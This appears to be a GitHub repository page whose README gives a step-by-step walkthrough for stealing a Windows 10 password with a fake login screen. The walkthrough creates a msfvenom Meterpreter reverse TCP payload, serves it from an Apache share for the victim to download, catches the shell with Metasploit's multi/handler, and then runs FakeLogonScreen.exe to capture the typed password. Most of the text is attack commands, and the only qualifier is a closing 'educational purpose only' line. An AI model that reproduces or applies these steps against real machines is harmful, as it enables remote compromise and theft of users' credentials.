https://github.com/iabdullah215/hacking-windows
Hacking Windows 10 password using fake login screen
https://github.com/iabdullah215/hacking-windows
fake-login-page windows-10 windows-hacking
Last synced: 5 months ago
JSON representation
Hacking Windows 10 password using fake login screen
- Host: GitHub
- URL: https://github.com/iabdullah215/hacking-windows
- Owner: iabdullah215
- Created: 2023-11-29T06:20:18.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-02-17T11:36:24.000Z (over 1 year ago)
- Last Synced: 2024-12-30T00:28:41.158Z (5 months ago)
- Topics: fake-login-page, windows-10, windows-hacking
- Homepage:
- Size: 19.5 KB
- Stars: 5
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## Windows Password Fishing with Fake Login Screen
# Things You Need:
* Kali Linux Machine (attacking machine).
* Windows 10 (victim machine).
# Step 1:
Start your Kali Linux machine and download the fake login screen from [here](https://github.com/bitsadmin/fakelogonscreen/releases)
# Step 2:
Now unzip the file using the command
```bash
unzip .zip
```
# Step 3:
After doing this you have to create a malicious payload using msfvenom. The exploit is as follow.
```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe >> .exe
```
It’s creating a Meterpreter reverse TCP shell payload for a Windows target. Meterpreter is an advanced, dynamically extensible payload that operates in memory.
# Step 4:
First create a directory by the name of share in the location mentioned below and then paste the file that you have created in the directory.
LOCATION: `/var/www/html`
```bash
cd /var/www/html
sudo mkdir share
```
Go back to the location where you have created the .exe file and then use this command to paste the file into the directory that you have made.
```bash
sudo cp /var/www/html/shares/
```
# Step 5:
Now turn on the Apache2 server by using the following command
```bash
sudo service apache2 start
```
# Step 6:
Now open up your windows 10 machine and then open your favorite browser and by using this format open the server.
```bash
http:///share
```
As you can see the file you created is there. So you have to simply download the file from the HTTP Server.
# Step 7:
After this go back to your Kali Linux machine and start the metasploit tool. First the command to set the module.
```bash
use multi/handler
```
# Step 8:
Then set the `Payload`, `LHOST`, and `LPORT` parameters by using the commands below.
```bash
set LHOST
set LPORT 4444 // it would be set to 4444 by default
set payload windows/meterpreter/reverse_tcp
```
# Step 9:
After this use any of the commands mentioned bellow to execute the exploit. After typing the command click the .exe file in the windows to start a connection.
```bash
run
exploit
```
# Step 10:
Now upload the file from your Linux machine to the windows machine in the LOCATION: `/root/Downloads/FakeLogonScreen.exe` (where my file was downloaded) by using the command.
# Step 11:
Now type the command below to enter the windows cmd.
```bash
shell
```
# Step 12:
After this run `.exe` file by just entering the download directory and typing the name of file i.e. `FakeLogonScreen.exe`
# Step 13:
After doing everything right you’ll see that all the running files on the windows will close and a login screen will open. Upon typing the password you’ll receive the feedback on the meterpreter terminal.
# Step 14:
Now type in the password. If you’ll type in the wrong password. It will tell on the terminal that the password is wrong and when you’ll type in the correct password It’ll tell that it is the correct one.
As I was in my personal user so I can’t compromise that. So I created a test user in order to exploit it. So i again went through all the stuff and yah eventually got the password.
## Use it for educational purpose only...